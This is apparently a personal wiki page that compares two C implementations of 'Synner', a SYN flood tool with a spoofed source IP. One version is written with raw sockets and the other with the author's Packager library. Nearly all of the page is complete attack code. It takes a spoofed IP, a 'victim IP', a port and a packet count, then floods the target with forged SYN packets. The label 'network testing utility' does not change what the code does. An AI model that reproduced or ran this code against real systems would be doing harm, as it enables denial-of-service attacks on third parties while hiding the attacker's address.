start > differences

differences

Created by pabrantes. Last edited by pabrantes, 2 years and 324 days ago. Viewed 1,124 times. #1

[edit] [rdf]

labels

attachments

Without Package Lib

/* * Synner: * a normal raw Syn Spoofer * by P. Abrantes * * Network testing utility * */

#include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/ip.h> #include <errno.h> #include <unistd.h> #include <sys/types.h> #include <netinet/tcp.h>

/* This is a checksum function that I saw * in the internet with some little modifications * to suit my needs */

unsigned short csum(unsigned short *addr,int len) { register int sum = 0; u_short answer = 0; register u_short *w = addr; register int nleft = len;

/* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; }

/* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; }

/* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer);

}

/* * Typedef is bad coding so I'll just * don't use it :P */

struct package { struct iphdr ipHeader ; struct tcphdr tcpHeader;

}package;

/* TCP RFC Pseudo Header * for tcp checksum calc */ struct pseudo { int saddr:32; int daddr:32; int zero:8; int PTCL:8; int TCP_len:16; struct tcphdr tcp; }pseudo;

int main(int argc, char **argv) {

struct package *flooder; struct sockaddr_in sin; struct pseudo header; int i,s, one=1; const int *value = &one;

if(argc!=5) { printf("%s <spoofed ip> <target ip> <target port> <number of packets>",argv[0]); exit(-1); }

i = atoi(argv[4]); sin.sin_family = AF_INET; sin.sin_addr.s_addr = inet_addr(argv[1]); sin.sin_port = htons(atoi(argv[3])); flooder = (struct package *)malloc(sizeof(struct package)); bzero(flooder,sizeof(flooder));

srandom((unsigned int) htons(atoi(argv[3])));

/* * This defines the IP Header * */ flooder->ipHeader.ihl=5; flooder->ipHeader.version=4; flooder->ipHeader.tos=0; flooder->ipHeader.tot_len= htons(sizeof(struct package)); flooder->ipHeader.id=htonl(54545); flooder->ipHeader.frag_off=0; flooder->ipHeader.ttl=MAXTTL; flooder->ipHeader.protocol=IPPROTO_TCP; flooder->ipHeader.check=0; flooder->ipHeader.saddr= inet_addr(argv[1]); flooder->ipHeader.daddr= inet_addr(argv[2]); flooder->ipHeader.check = csum( (unsigned short *)flooder, sizeof(struct iphdr));

/* * This defines the TCP Header * */

flooder->tcpHeader.source = htons(35555); flooder->tcpHeader.dest = htons(atoi(argv[3])); flooder->tcpHeader.seq = htonl(random()); flooder->tcpHeader.ack_seq = htonl(0); flooder->tcpHeader.syn=1; flooder->tcpHeader.window = htons(5848); flooder->tcpHeader.check=0; flooder->tcpHeader.doff=5;

/* And the pseudo header */

header.saddr = flooder->ipHeader.saddr; header.daddr = flooder->ipHeader.daddr; header.zero = 0; header.PTCL=IPPROTO_TCP; header.TCP_len = htons(sizeof(struct tcphdr)); bcopy( (char *)&(flooder->tcpHeader), (char *)&header.tcp, sizeof(struct tcphdr));

flooder->tcpHeader.check = csum( (unsigned short *)&header, sizeof(struct tcphdr)+12);

/* * Now let's open the socket */

if((s=socket(PF_INET, SOCK_RAW, IPPROTO_RAW))<0) perror("socket:");

if(setsockopt (s, SOL_IP, IP_HDRINCL, value, sizeof(one))!=0) perror("setsockopt");

while(i>0) {

if( sendto(s, flooder, sizeof(struct tcphdr)+sizeof(struct iphdr), 0, (struct sockaddr *)&sin, sizeof(sin)) <0) perror("sendto");

flooder->tcpHeader.seq=htonl(random()); /*flooder->tcpHeader.source++; */ flooder->tcpHeader.check = 0; memset(&(header.tcp),0x90,sizeof(struct tcphdr));

bcopy( (char *)&(flooder->tcpHeader), (char *)&header.tcp, sizeof(struct tcphdr)); flooder->tcpHeader.check = csum( (unsigned short *)&header, sizeof(struct tcphdr)+12);

i--; }

printf("Donen");

}

Now let's see how it would be done using Package Lib:

/* * Synner Version 0.2 * * By P. Abrantes AKA Ghost_Rider */ #include "packager.h" #include <stdlib.h>

int main(int argc, char *argv[]) {

struct TCPpackage *theFlooder; struct sockaddr_in sin; int total, s, id, sport, seq;

if(argc!=5) { printf("Synner v0.2 (now using Packager lib).nUsage: %s <spoofed IP> <victim IP> <port> <number of packets>n", argv[0]); exit(-1); }

theFlooder = allocTCPpackage(); srandom((unsigned int) htons(atoi(argv[3]))); total = atoi(argv[4]);

theFlooder->ip = build_IPpacket(argv[1], argv[2], 0, 0, MAXTTL, TCP, 0); theFlooder->tcp = build_TCPpacket(0, atoi(argv[3]), 0, 0,1,0,0,0,0,0,4096,5,&(theFlooder->ip),0,NULL); sin.sin_family = AF_INET; sin.sin_addr.s_addr = inet_addr(argv[1]); sin.sin_port = htons(atoi(argv[3]));

if(createSendingRawSock(&s)<0) { perror("createSendingRawSock:"); exit(-1); }

while(total>0) { id = 1+ (int) (1000.0*rand()/(RAND_MAX+1.0)); sport = 1 + (int) (65000.0*rand()/(RAND_MAX+1.0)); seq = 1 + (int) (999999.0*rand()/(RAND_MAX+1.0));

resetIPid(&(theFlooder->ip), id); resetTCPsport(&(theFlooder->tcp), sport); resetTCPseq(&(theFlooder->tcp), seq); resetTCPcsum(theFlooder);

if(sendPackage(s, theFlooder, TCP, 0, sin)<0) perror("sendPackage:"); total--; } printf("Done."); }

Please login to www.pabrantes.net.